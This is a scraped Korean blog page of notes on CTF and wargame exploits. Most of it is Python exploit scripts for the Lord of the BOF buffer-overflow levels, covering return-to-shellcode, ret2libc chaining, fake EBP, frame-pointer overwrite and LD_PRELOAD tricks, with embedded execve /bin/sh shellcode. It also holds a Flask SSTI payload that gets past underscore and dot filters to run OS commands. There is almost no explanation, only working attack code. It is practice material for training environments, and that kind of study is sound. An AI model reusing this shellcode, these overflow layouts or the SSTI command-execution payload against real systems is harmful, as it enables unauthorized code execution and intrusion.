exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/succubus/nightmare'
strcpyAddress = p(0x8048410)
shellAddress = p(0xbffffa74)
shellCode = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*11
dstAddress = p(0xbffffaa0)
srcAddress = p(0xbffffa70)
payload = shellCode+"A"*4+strcpyAddress+"A"*4+dstAddress+srcAddress

os.execl(path,path,payload)


블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Node.js Unicode Failure

2019. 4. 22. 20:52

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Flask SSTI인데 필터링이 _ 랑 . 이렇게 두개밖에 없다. 필터가 빡센편이 아니라 아래 페이로드로 우회해서 명령어 실행해주면 된다. 


payload

{{''['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f'][2]['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('ls')['read']()}}


{{''['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f'][2]['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('cat fort\x2epy')['read']()}}



'CTF > Writeup' 카테고리의 다른 글

DEF CON CTF Qualifier 2019 cant_even_unplug_it  (0) 2019.05.13
angstrom ctf 2019 Web Write up  (0) 2019.04.25
Byte Bandits CTF 2019 Web Writeup  (0) 2019.04.14
Midnight Sun CTF 2019 Quals Rubenscube  (0) 2019.04.08
CBM CTF 2019 Writeup  (0) 2019.04.08
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

chainning.py


import os

from struct import *


p = lambda x : pack("<L" , x)

path = '/home/zombie_assassin/succubus'

doAddress = p(0x80487ec)

gyeAddress = p(0x80487bc)

gulAddress = p(0x804878c)

yutAddress = p(0x804875c)

moAddress = p(0x8048724)

paramAddress = p(0xbffffa48)

payload = "A"*44+doAddress+gyeAddress+gulAddress+yutAddress+moAddress+"AAAA"+paramAddress+"\x2f\x62\x69\x6e"+"\x2f\x73\x68"

os.execl(path,path,payload)


retSled.py


import os

from struct import *


p = lambda x : pack("<L" , x)

path = '/home/zombie_assassin/succubus'

doAddress = p(0x80487ec)

shellAddress = p(0xbffffa14)

shellCode ="\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"

payload = "A"*44+doAddress+shellAddress+shellCode


os.execl(path,path,payload)


블로그 이미지

JeonYoungSin

메모 기록용 공간

,

exploit.py


import os

from struct import *


p = lambda x : pack("<L" , x)

path = '/home/assassin/zombie_assassin'

leaveRetGaget = p(0x80484df)

shellAddress = p(0xbffffa74)

shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

fEbpAddress = p(0xbffffa6c)

payload = shellAddress+"\x90"*11+shellCode+fEbpAddress+leaveRetGaget


os.execl(path,path,payload)

블로그 이미지

JeonYoungSin

메모 기록용 공간

,

exploit.py


import os

from struct import *


p = lambda x : pack("<L" , x)

path = '/home/giant/assassin'

retGaget = p(0x804851e)

shellAddress = p(0xbffffbd8)

payload = "A"*44+retGaget+shellAddress


os.execl(path,path,payload)


블로그 이미지

JeonYoungSin

메모 기록용 공간

,

exploit.py


import os

from struct import *


p = lambda x : pack("<L" , x)

path = '/home/bugbear/'+p(0xbffffc79)

systemAddress = p(0x400A9D48)

param1 = p(0xbffffc79)

param2 = p(0xbffffff7)

param3 = p(0xbffffffc)

payload = "A"*44 + systemAddress + "BBBB" + param1 + param2 + param3


os.system("mv /home/bugbear/giant "+p(0xbffffc79))

os.execl(path,path,payload)

블로그 이미지

JeonYoungSin

메모 기록용 공간

,

exploit.py


import os

from struct import *


p = lambda x : pack("<L" , x)

path = '/home/darkknight/bugbear'

systemAddress = p(0x40058ae0)

shellParamAddress = p(0xbffffc6d)

payload = "A"*44 + systemAddress + "BBBB" + shellParamAddress


os.execl(path,path,payload)


'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB giant-> assassin  (0) 2019.04.18
[Remind] LOB bugbear -> giant  (0) 2019.04.18
[Remind] LOB golem -> darkknight  (0) 2019.04.16
[Remind] LOB skeleton -> golem  (0) 2019.04.16
[Remind] LOB vampire -> skeleton  (0) 2019.04.16
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

exploit.py


import os

from struct import *


p = lambda x : pack("<L" , x)

path = '/home/golem/darkknight'

shellAddress = p(0xbffffa98)

FPO_Byte = "\x90"

payload = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*11+FPO_Byte


os.execl(path,path,payload)


'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB bugbear -> giant  (0) 2019.04.18
[Remind] LOB darkknight -> bugbear  (0) 2019.04.16
[Remind] LOB skeleton -> golem  (0) 2019.04.16
[Remind] LOB vampire -> skeleton  (0) 2019.04.16
[Remind] LOB troll -> vampire  (0) 2019.04.16
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

exploit.py


import os

from struct import *


p = lambda x : pack("<L" , x)

path = '/home/skeleton/golem'

shellAddress =  p(0xbffff530)

payload = "A"*44+shellAddress

shellCode = "\x90"*155+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"


os.system("touch test.c")

os.system("gcc -shared -fPIC -o " + shellCode + " test.c")

os.environ["LD_PRELOAD"] = "./"+shellCode

os.execl(path,path,payload)


'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB darkknight -> bugbear  (0) 2019.04.16
[Remind] LOB golem -> darkknight  (0) 2019.04.16
[Remind] LOB vampire -> skeleton  (0) 2019.04.16
[Remind] LOB troll -> vampire  (0) 2019.04.16
[Remind] LOB orge -> troll  (0) 2019.04.15
블로그 이미지

JeonYoungSin

메모 기록용 공간

,